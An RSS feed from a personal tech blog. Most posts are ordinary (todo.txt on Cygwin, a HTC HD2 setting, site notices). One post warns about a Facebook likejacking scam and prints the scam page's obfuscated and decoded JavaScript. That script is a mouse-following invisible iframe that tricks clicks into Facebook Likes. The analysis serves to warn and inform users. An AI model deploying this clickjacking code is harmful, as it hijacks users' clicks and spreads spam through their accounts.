<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>MajorAap.com - A personal blog by Aprazeth</title>
	<atom:link href="http://www.majoraap.com/feed" rel="self" type="application/rss+xml" />
	<link>http://www.majoraap.com</link>
	<description>The ramblings of Aprazeth, an recent convert to minimalism, enthusiast of computer technology - with an outspoken opinion about everything and everyone.</description>
	<lastBuildDate>Tue, 14 Jun 2011 09:21:12 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>F-Secure Safe Links</title>
		<link>http://www.majoraap.com/f-secure-safe-links-359?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=f-secure-safe-links</link>
		<comments>http://www.majoraap.com/f-secure-safe-links-359#comments</comments>
		<pubDate>Tue, 14 Jun 2011 09:21:12 +0000</pubDate>
		<dc:creator>Aprazeth</dc:creator>
				<category><![CDATA[Geek Stuff]]></category>
		<category><![CDATA[Site Related news]]></category>

		<guid isPermaLink="false">http://www.majoraap.com/?p=359</guid>
		<description><![CDATA[As you might notice, the site now shows a green check-mark next to every external link. This is a feature of a plugin from F-Secure. What it basically does is, it validates every external URL to ensure that the link &#8230; <a href="http://www.majoraap.com/f-secure-safe-links-359">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>As you might notice, the site now shows a green check-mark next to every external link. This is a feature of a plugin from F-Secure.</p>
<p>What it basically does is, it validates every external URL to ensure that the link is safe &#8211; as shown by the green check-mark next to it. It will also show the green check-mark next to an image that has a link, so no funky business going there ;)</p>
<p>That is all &#8211; and yes I am aware I haven&#8217;t posted again in months (woops)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.majoraap.com/f-secure-safe-links-359/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Setting up Todo.txt on Windows in Dropbox</title>
		<link>http://www.majoraap.com/setting-up-todo-txt-on-windows-in-dropbox-354?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=setting-up-todo-txt-on-windows-in-dropbox</link>
		<comments>http://www.majoraap.com/setting-up-todo-txt-on-windows-in-dropbox-354#comments</comments>
		<pubDate>Tue, 25 Jan 2011 21:05:01 +0000</pubDate>
		<dc:creator>Aprazeth</dc:creator>
				<category><![CDATA[Geek Stuff]]></category>
		<category><![CDATA[Just fun]]></category>
		<category><![CDATA[Personal]]></category>

		<guid isPermaLink="false">http://www.majoraap.com/?p=354</guid>
		<description><![CDATA[One of the things that I really enjoy every once in a while, is using the prompt &#8211; DOS, Bash, Terminal &#8211; whichever name it carries. A while ago I came across an application (well actually a script) that is &#8230; <a href="http://www.majoraap.com/setting-up-todo-txt-on-windows-in-dropbox-354">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>One of the things that I really enjoy every once in a while, is using the prompt &#8211; DOS, Bash, Terminal &#8211; whichever name it carries. A while ago I came across an application (well actually a script) that is free, helps you create to-do lists, runs in a prompt (command-line goodness!) and saves everything in TXT.</p>
<p>You may have heard of it, you may not &#8211; it&#8217;s called todo.txt &#8211; and is available on <a href="http://todotxt.com/">http://todotxt.com/</a> or <a href="http://lifehacker.com/5155450/todotxt-cli-manages-your-tasks-from-the-command-line">http://lifehacker.com/5155450/todotxt-cli-manages-your-tasks-from-the-command-line</a></p>
<p>Recently, an Android client got released which made it the perfect tool for me. Especially since it&#8217;s working with Dropbox on Android. What I wanted to achieve was it to run on my machine as well &#8211; and it using the same todo.txt from my Dropbox. Effectively my to-do list would then be in the cloud, and updated where-ever I work with it :)</p>
<p>To set this up on your machine as well, download the release from http://todotxt.com.</p>
<p>Now, here comes the tricky part &#8211; how do you open/run the .SH file which is what todo.txt really is? This is where it gets tricky &#8211; you need CygWin. A bash command-line on Windows (I know, it&#8217;s more &#8211; but for the ease of reference I opted for this explanation) Yet another free tool available on <a href="http://cygwin.com/">http://cygwin.com/</a></p>
<p>Click on <a href="http://cygwin.com/install.html">Install Cygwin</a> and then on <a href="http://cygwin.com/setup.exe">Setup.exe</a>. Please save the file on your computer and then run it. During the installation, simply do not change any options at all. Just keep hitting that <strong>Next </strong>button ;-) When it asks to select a Download site try to find one that looks as if it could be close by (so if you are in Germany, look for servers with the .DE domain, if you are in France &#8211; for .FR etc.)</p>
<p>Then it will ask you to select the packages to install &#8211; simply hit <strong>Next </strong>again. The installer will now download and install the necessary packages on your computer &#8211; so have a cup of tea/coffee.</p>
<p>Once it&#8217;s done, click on <strong>Finish </strong>to close the setup.</p>
<p>Start <strong>Cygwin </strong>(from either your desktop or from the Start-menu) and once it&#8217;s ready &#8211; type in &#8220;<strong>exit</strong>&#8221; so it closes.</p>
<p>Now, back to the ZIP-file you downloaded from http://todotxt.com &#8211; extract the 2 files. Place <strong>todo.cfg</strong> and<strong> todo.sh</strong> in the the following folder:</p>
<p><strong>C:\Cygwin\Home\JohnDoe</strong></p>
<blockquote><p><span style="font-style: normal;">Replace JohnDoe with the username you use to login into Windows.</span></p></blockquote>
<p>Open todo.cfg with Notepad (in case Windows asks what program to use to edit/open it with, select Notepad) and replace the Todo_dir line so that it reads:</p>
<p><strong>export TODO_DIR=&#8221;/cygdrive/c/users/JohnDoe/dropbox/todo</strong></p>
<blockquote><p><span style="font-style: normal;">Replace /users/JohnDoe/Dropbox/todo with the location of your Dropbox folder with the Todo.txt &#8211; in the example shown this is on a Windows 7 machine, with a default installation of Dropbox. Be sure to append/change where needed.</span></p></blockquote>
<p>Save the file and open Cygwin and type:</p>
<p><strong>./todo.sh</strong></p>
<p>From that point on &#8211; please refer to the http://todotxt.com documentation on how to run or operate it.</p>
<p>Enjoy!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.majoraap.com/setting-up-todo-txt-on-windows-in-dropbox-354/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Planned maintenance 21 to 22 October between 0100 and 0700 CET</title>
		<link>http://www.majoraap.com/planned-maintenance-21-to-22-october-between-0100-and-0700-cet-350?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=planned-maintenance-21-to-22-october-between-0100-and-0700-cet</link>
		<comments>http://www.majoraap.com/planned-maintenance-21-to-22-october-between-0100-and-0700-cet-350#comments</comments>
		<pubDate>Thu, 21 Oct 2010 20:48:59 +0000</pubDate>
		<dc:creator>Aprazeth</dc:creator>
				<category><![CDATA[Site Related news]]></category>

		<guid isPermaLink="false">http://www.majoraap.com/?p=350</guid>
		<description><![CDATA[Well &#8211; as above. During the above time-frame there will be planned maintenance on the website, so it might be slow, down or unreachable for a while. If all thing goes correctly it all should be back by 0700 CET &#8230; <a href="http://www.majoraap.com/planned-maintenance-21-to-22-october-between-0100-and-0700-cet-350">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Well &#8211; as above. During the above time-frame there will be planned maintenance on the website, so it might be slow, down or unreachable for a while. If all thing goes correctly it all should be back by 0700 CET on the 22nd of October.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.majoraap.com/planned-maintenance-21-to-22-october-between-0100-and-0700-cet-350/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Learning Portal for Windows 7 deployment</title>
		<link>http://www.majoraap.com/learning-portal-for-windows-7-deployment-348?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=learning-portal-for-windows-7-deployment</link>
		<comments>http://www.majoraap.com/learning-portal-for-windows-7-deployment-348#comments</comments>
		<pubDate>Wed, 15 Sep 2010 12:19:41 +0000</pubDate>
		<dc:creator>Aprazeth</dc:creator>
				<category><![CDATA[Geek Stuff]]></category>
		<category><![CDATA[freeware]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[windows 7]]></category>

		<guid isPermaLink="false">http://www.majoraap.com/?p=348</guid>
		<description><![CDATA[Just thought I&#8217;d pass on this handy page on The Springboard Blog &#8211; source; http://windowsteamblog.com/windows/b/springboard/archive/2010/09/10/springboard-windows-7-deployment-learning-portal.aspx The Springboard Deployment Learning Portal is an online assessment and learning tool, designed to help IT Pros identify their knowledge strengths and information gaps around &#8230; <a href="http://www.majoraap.com/learning-portal-for-windows-7-deployment-348">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Just thought I&#8217;d pass on this handy page on The Springboard Blog &#8211; source; <a title="http://windowsteamblog.com/windows/b/springboard/archive/2010/09/10/springboard-windows-7-deployment-learning-portal.aspx" href="http://windowsteamblog.com/windows/b/springboard/archive/2010/09/10/springboard-windows-7-deployment-learning-portal.aspx">http://windowsteamblog.com/windows/b/springboard/archive/2010/09/10/springboard-windows-7-deployment-learning-portal.aspx</a></p>
<blockquote><p>The <a href="http://technet.microsoft.com/en-us/windows/ff470986.aspx?ITPID=SPBLOG">Springboard Deployment Learning Portal</a> is an online assessment and learning tool, designed to help IT Pros  identify their knowledge strengths and information gaps around Windows 7  deployment.  Based on interactive assessment responses, the participant  is provided targeted learning to help them gain critical deployment  know-how, keeping them at the top of their game.</p></blockquote>
<p>I tried it myself and I was pleasantly surprised by the ease of the tests, and the tips it gives to learn more about it.</p>
<p>So if you are deploying Windows, Office within your environment &#8211; whether it is via MDOP, WDS, RIS or SCCM &#8211; take a quick dab at the tests and see where you can learn more.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.majoraap.com/learning-portal-for-windows-7-deployment-348/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Improving text quality on your HTC HD2</title>
		<link>http://www.majoraap.com/improving-text-quality-on-your-htc-hd2-345?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=improving-text-quality-on-your-htc-hd2</link>
		<comments>http://www.majoraap.com/improving-text-quality-on-your-htc-hd2-345#comments</comments>
		<pubDate>Tue, 20 Jul 2010 13:33:38 +0000</pubDate>
		<dc:creator>aprazeth</dc:creator>
				<category><![CDATA[Geek Stuff]]></category>
		<category><![CDATA[Just fun]]></category>
		<category><![CDATA[HD2]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.majoraap.com/?p=345</guid>
		<description><![CDATA[For whatever reason (unknown to me at this point) ClearType is turned off on (at least my) HTC HD2 by default. To turn it on, and improve the quality of your text/reading &#8211; simply do to the following: Go to &#8230; <a href="http://www.majoraap.com/improving-text-quality-on-your-htc-hd2-345">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>For whatever reason (unknown to me at this point) ClearType is turned <strong>off</strong> on (at least my) HTC HD2 by default.</p>
<p>To turn it on, and improve the quality of your text/reading &#8211; simply do to the following:</p>
<p>Go to <strong>Settings</strong>, either via the Start-menu or HTC Sense.<br />
Tap on <strong>Menu </strong>in the lower-left corner, and select <strong>All Settings</strong>.<br />
Tap on <strong>System</strong>.<br />
Tap on <strong>Display</strong>.<br />
Tap on the tab <strong>ClearType</strong>.<br />
Tick the box and tap <strong>OK </strong>in the upper-rightcorner.</p>
<p>I personally recommend restarting the phone once you have turned it on.</p>
<p>Enjoy the improved text/font rendering!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.majoraap.com/improving-text-quality-on-your-htc-hd2-345/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Facebook spam-link</title>
		<link>http://www.majoraap.com/facebook-spam-link-341?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=facebook-spam-link</link>
		<comments>http://www.majoraap.com/facebook-spam-link-341#comments</comments>
		<pubDate>Sat, 03 Jul 2010 11:37:22 +0000</pubDate>
		<dc:creator>Aprazeth</dc:creator>
				<category><![CDATA[Geek Stuff]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[oops]]></category>

		<guid isPermaLink="false">http://www.majoraap.com/?p=341</guid>
		<description><![CDATA[Please be aware of a malicious link making rounds on Facebook. The title is: &#8220;The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED&#8221; The link leads to hxxp://thecraziesttattoos.blogspot.com/ which shows an image, purposely mimicking an add. If you click the &#8216;Skip &#8230; <a href="http://www.majoraap.com/facebook-spam-link-341">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Please be aware of a malicious link making rounds on Facebook. The title is:</p>
<p>&#8220;<strong>The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED</strong>&#8221;</p>
<p>The link leads to hxxp://thecraziesttattoos.blogspot.com/ which shows an image, purposely mimicking an add. If you click the &#8216;Skip this add&#8217; or anywhere on the image you are redirected to; hxxp://ly9.net/4/4jsVF3 (which resolves to: hxxp://allhqpics.com/the-craziest-tat-youll-ever-see.html)</p>
<p>On that page you will see yet another image asking you to acknowledge you are, or are over 18. Clicking anywhere on that image will actually instruct Facebook you like that page &#8211; and that will post it on your wall. Your friends then click on it &#8211; and so on.</p>
<p>More information after the link (<strong>geek-alert!</strong>)</p>
<p><span id="more-341"></span></p>
<p>The code on hxxp://allhqpics.com/the-craziest-tat-youll-ever-see.html is quite cleverly constructed. The actual source of that HTML file is:</p>
<blockquote><p>Source</p>
<p>&lt;head&gt;<br />
&lt;title&gt;The SHOCKING TATTOO That Got This Girls PARENTS ARRESTED!!&lt;/title&gt;<br />
&lt;script src=&#8221;jquery.js&#8221; type=&#8221;text/javascript&#8221;&gt;&lt;/script&gt;<br />
&lt;script src=&#8221;top10.js&#8221; type=&#8221;text/javascript&#8221;&gt;&lt;/script&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
&lt;center&gt;&lt;img src=&#8221;18.png&#8221;&gt;&lt;/center&gt;<br />
&lt;script src=&#8221;bottom.js&#8221; type=&#8221;text/javascript&#8221;&gt;&lt;/script&gt;<br />
&lt;/body&gt;</p></blockquote>
<p>The referenced bottom.js contains the follow escaped Javascript:</p>
<blockquote><p>Escaped bottom.js</p>
<p>&lt;!&#8211;</p>
<p>document.write(unescape(&#8216;%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%<br />
67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%<br />
30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%<br />
30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%63%63%65%73%73%2E%69%6D%<br />
2F%37%2F%6A%63%70%53%74%34%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%<br />
64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%<br />
20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%<br />
65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%<br />
20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%<br />
72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3<br />
D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62<br />
%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%<br />
70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%<br />
20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%<br />
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%<br />
66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%<br />
79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%<br />
2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%<br />
4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%<br />
2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%<br />
79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%<br />
6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%<br />
29%20%7B%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%<br />
69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%<br />
63%72%69%70%74%3E&#8217;));</p>
<p>//&#8211;&gt;</p></blockquote>
<p>When unescaped the following code is revealed;</p>
<blockquote><p>&lt;!&#8211;</p>
<p>document.write(unescape(&#8216;&lt;div style=&#8221;overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;&#8221; id=&#8221;icontainer&#8221;&gt;<br />
&lt;iframe src=&#8221;hxxp://access.im/7/jcpSt4&#8243; scrolling=&#8221;no&#8221; frameborder=&#8221;0&#8243; style=&#8221;border:none; overflow:hidden; width:50px; height:23px;&#8221; allowTransparency=&#8221;true&#8221; id=&#8221;fbframe&#8221; name=&#8221;fbframe&#8221;&gt;&lt;/iframe&gt;<br />
&lt;/div&gt;<br />
&lt;script&gt;<br />
var iflag = 0;<br />
var icontainer = document.getElementById(&#8216;icontainer&#8217;);<br />
var standardbody=(document.compatMode==&#8221;CSS1Compat&#8221;)? document.documentElement : document.body //create reference to common &#8220;body&#8221; across doctypes</p>
<p>function mouseFollower(e){</p>
<p>/*                    DO NOT EDIT THIS                         */</p>
<p>if (window.event)<br />
{ // for IE<br />
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+&#8217;px&#8217;;<br />
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+&#8217;px&#8217;;<br />
}</p>
<p>else</p>
<p>{</p>
<p>icontainer.style.top = (e.pageY-5)+&#8217;px&#8217;;<br />
icontainer.style.left = (e.pageX-5)+&#8217;px&#8217;;</p>
<p>}</p>
<p>}</p>
<p>document.onmousemove = function(e) {<br />
if (iflag == 0) {mouseFollower(e);}</p>
<p>else</p>
<p>{<br />
icontainer.style.display = &#8216;none&#8217;; }</p>
<p>}</p>
<p>&lt;/script&gt;&#8217;));<br />
//&#8211;&gt;</p></blockquote>
<p>As you can see it refers to hxxp://access.im/7/jcpSt4. That page has the following source:</p>
<blockquote>
<div id="_mcePaste">&lt;!DOCTYPE html PUBLIC &#8220;-//W3C//DTD XHTML 1.0 Strict//EN&#8221;</div>
<div id="_mcePaste">&#8220;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&#8221;&gt;</div>
<div id="_mcePaste">&lt;html xmlns=&#8221;http://www.w3.org/1999/xhtml&#8221; xml:lang=&#8221;nl&#8221; lang=&#8221;nl&#8221; id=&#8221;facebook&#8221;&gt;</div>
<div id="_mcePaste">&lt;head&gt;</div>
<div id="_mcePaste">&lt;meta http-equiv=&#8221;Content-type&#8221; content=&#8221;text/html; charset=utf-8&#8243; /&gt;</div>
<div id="_mcePaste">&lt;meta http-equiv=&#8221;Content-language&#8221; content=&#8221;nl&#8221; /&gt;</div>
<div id="_mcePaste">&lt;script type=&#8221;text/javascript&#8221;&gt;</div>
<div id="_mcePaste">//&lt;![CDATA[</div>
<div id="_mcePaste">CavalryLogger=false;window._is_quickling_index="";</div>
<div id="_mcePaste">//]]&gt;</div>
<div id="_mcePaste">&lt;/script&gt;&lt;noscript&gt; &lt;meta http-equiv=refresh content=&#8221;0; URL=?href=http%3A%2F%2Fthecraziesttattoos.blogspot.com%2F&amp;amp;amp%3Blayout=standard&amp;amp;amp%3Bshow_faces=false&amp;amp;amp%3Bwidth=450&amp;amp;amp%3Baction=like&amp;amp;amp%3Bfont=tahoma&amp;amp;amp%3Bcolorscheme=light&amp;amp;amp%3Bheight=80&amp;amp;_fb_noscript=1&#8243; /&gt; &lt;/noscript&gt;</div>
<div id="_mcePaste">&lt;meta name=&#8221;robots&#8221; content=&#8221;noodp,noydir&#8221; /&gt;</div>
<div id="_mcePaste">&lt;meta name=&#8221;description&#8221; content=&#8221; Facebook is een sociaal netwerk dat vrienden, collega&amp;#039;s, studiegenoten en kennissen met elkaar in contact brengt. Gebruik Facebook om op de hoogte te blijven van hoe het met je vrienden gaat, om onbeperkt foto&amp;#039;s te uploaden, links en video&amp;#039;s uit te wisselen en meer te weten te komen over de mensen die je ontmoet.&#8221; /&gt;</div>
<div id="_mcePaste">&lt;link rel=&#8221;alternate&#8221; media=&#8221;handheld&#8221; href=&#8221;http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fthecraziesttattoos.blogspot.com%2F&amp;amp;amp%3Blayout=standard&amp;amp;amp%3Bshow_faces=false&amp;amp;amp%3Bwidth=450&amp;amp;amp%3Baction=like&amp;amp;amp%3Bfont=tahoma&amp;amp;amp%3Bcolorscheme=light&amp;amp;amp%3Bheight=80&#8243; /&gt;</div>
<div id="_mcePaste">&lt;link type=&#8221;text/css&#8221; rel=&#8221;stylesheet&#8221; href=&#8221;http://static.ak.fbcdn.net/rsrc.php/z9V3V/hash/cn4ut1mh.css&#8221; /&gt;</div>
<div id="_mcePaste">&lt;script type=&#8221;text/javascript&#8221; src=&#8221;http://b.static.ak.fbcdn.net/rsrc.php/z78UV/hash/abtj54l6.js&#8221;&gt;&lt;/script&gt;</div>
<div id="_mcePaste">&lt;title&gt;The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED | Facebook&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;div id=&#8221;FB_HiddenContainer&#8221; style=&#8221;position:absolute; top:-10000px; width:0px; height:0px;&#8221; &gt;&lt;/div&gt;&lt;div id=&#8221;connect_widget_4c2f1e4c211ae5e7d0191&#8243;&gt;&lt;table&gt;&lt;tr&gt;&lt;td&gt;&lt;div&gt;&lt;div&gt;&lt;a&gt;&lt;span&gt;Vind ik leuk&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td&gt;&lt;div&gt;&lt;div&gt;&lt;span style=&#8221;"&gt;&lt;/span&gt;&lt;span&gt;&lt;span&gt;Jij en 4.494 anderen vinden dit leuk.&lt;/span&gt;&lt;span&gt;4.494 personen vinden dit leuk.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;middot;&amp;nbsp;&lt;a&gt;Beheerderspagina&lt;/a&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;middot;&amp;nbsp;&lt;a&gt;Fout&lt;/a&gt;&lt;/span&gt;&lt;span&gt;&lt;a href=&#8221;#&#8221;&gt;Vind ik niet leuk&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span&gt;Je vindt &lt;b&gt;The *SHOCKING* TATTOO That Got This Girls PARENTS ARRESTED&lt;/b&gt; leuk.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;script type=&#8221;text/javascript&#8221;&gt;</div>
<div id="_mcePaste">Env={module:&#8221;like_widget&#8221;,impid:&#8221;c29bdf52&#8243;,user:0,locale:&#8221;nl_NL&#8221;,method:&#8221;GET&#8221;,dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:262076,vip:&#8221;66.220.147.44&#8243;,static_base:&#8221;http:\/\/static.ak.fbcdn.net\/&#8221;,www_base:&#8221;http:\/\/www.facebook.com\/&#8221;,tlds:["com"],rep_lag:2,pc:{&#8220;m&#8221;:&#8221;1.0.4&#8243;,&#8221;l&#8221;:&#8221;1.0.4&#8243;,&#8221;axi&#8221;:true,&#8221;j&#8221;:true,&#8221;bsz&#8221;:16},fb_dtsg:&#8221;4hbEx&#8221;,lhsh:&#8221;7b555S0gTjO7Ys4xJtZKuBAfETw&#8221;,silent_oops_errors:&#8221;1&#8243;};</div>
<div id="_mcePaste">&lt;/script&gt;</div>
<div id="_mcePaste">&lt;script type=&#8221;text/javascript&#8221;&gt;Bootloader.setResourceMap({&#8220;WZ0fA&#8221;:{&#8220;name&#8221;:&#8221;js\/3mzx17quneyo8kc4.pkg.js&#8221;,&#8221;type&#8221;:&#8221;js&#8221;,&#8221;src&#8221;:&#8221;http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/zB4BM\/hash\/d1w9lhbq.js&#8221;},&#8221;uCKJ8&#8243;:{&#8220;name&#8221;:&#8221;css\/dr0uq2rbrrww0cgc.pkg.css&#8221;,&#8221;type&#8221;:&#8221;css&#8221;,&#8221;permanent&#8221;:1,&#8221;src&#8221;:&#8221;http:\/\/static.ak.fbcdn.net\/rsrc.php\/z9V3V\/hash\/cn4ut1mh.css&#8221;},&#8221;F+B8D&#8221;:{&#8220;name&#8221;:&#8221;js\/19khsprwvtvokwow.pkg.js&#8221;,&#8221;type&#8221;:&#8221;js&#8221;,&#8221;src&#8221;:&#8221;http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z78UV\/hash\/abtj54l6.js&#8221;},&#8221;NJtdf&#8221;:{&#8220;name&#8221;:&#8221;js\/lib\/net\/async_postlude.js&#8221;,&#8221;type&#8221;:&#8221;js&#8221;,&#8221;src&#8221;:&#8221;http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z2ATW\/hash\/835vzsrg.js&#8221;}});</div>
